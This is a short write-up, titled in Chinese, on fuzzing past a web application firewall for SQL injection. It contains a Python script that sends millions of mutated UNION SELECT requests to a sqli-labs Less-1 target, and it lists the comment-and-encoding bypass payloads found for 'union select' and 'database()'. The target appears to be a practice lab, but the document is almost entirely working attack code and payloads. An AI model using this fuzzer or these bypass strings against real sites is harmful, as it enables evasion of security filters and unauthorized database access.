fuzz绕waf(SQL注入)
1.fuzz.py
import itertools
import sys

import requests
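# Fuzz the five token positions between "database" and "()" in a fixed
# UNION SELECT payload against the sqli-labs Less-1 endpoint configured
# below, and append every URL whose response body contains "Password" to
# Results.txt.
#
# Candidate tokens for each position: SQL comment fragments and operators,
# the empty string (so combinations of fewer than five tokens are tried as
# well), and a set of "%0x" sequences placed verbatim in the query string.
fuzz_zs = ['/*', '*/', '/*!', '/**/', '?', '/', '*', '=', '`', '!', '%', '.', '-', '+']
fuzz_sz = ['']
fuzz_ch = ["%0a", "%0b", "%0c", "%0d", "%0e", "%0f", "%0g", "%0h", "%0i", "%0j", "%0k", "%0l", "%0m", "%0n"]
fuzz = fuzz_zs + fuzz_sz + fuzz_ch
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36"}
url_start = "http://192.168.254.198/sqli-labs/Less-1/?id=-1'"
# Number of 5-token combinations, used only for the progress counter. Named
# `total` rather than `len` so the builtin len() is not shadowed.
# With 29 tokens this is 29**5 (about 20.5 million) separate GET requests,
# every one of which lands in the target's access and WAF logs.
total = len(fuzz) ** 5
# itertools.product(fuzz, repeat=5) yields exactly the same (a, b, c, d, e)
# sequence as five nested for-loops over `fuzz`; `num` counts from 1.
for num, (a, b, c, d, e) in enumerate(itertools.product(fuzz, repeat=5), start=1):
    payload = "/*!union/*/*!?*/%0bselect*/ 1,2,database" + a + b + c + d + e + "() --+"
    url = url_start + payload
    # Blank the progress line, print the URL being tried, then redraw the counter.
    sys.stdout.write(' ' * 30 + '\r')
    sys.stdout.flush()
    print("Now URL:" + url)
    sys.stdout.write("完成进度:%s/%s \r" % (num, total))
    sys.stdout.flush()
    # The timeout keeps a single stalled connection from hanging the run
    # indefinitely; a timeout or connection error propagates and stops the
    # script, as any request error already did.
    res = requests.get(url, headers=headers, timeout=10)
    # Success heuristic: presumably the Less-1 page echoes "Password" when the
    # injected query returns rows — verify against the lab page.
    if "Password" in res.text:
        with open("Results.txt", 'a', encoding='utf-8') as r:
            r.write(url + "\n")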
2.payload
payload根据测试的结果依次进行更改
绕过union select:"/*!union" + a + b + c + d + e + "select*/ 1,2,3 --+"
结果:"/*!union/*/*!?*/%0bselect*/ 1,2,3 --+"
绕过database():"/*!union/*/*!?*/%0bselect*/ 1,2,database"+a+b+c+d+e+"() --+"
结果:/*!union/*/*!?*/%0bselect*/ 1,2,database/*/**//**/%0b() --+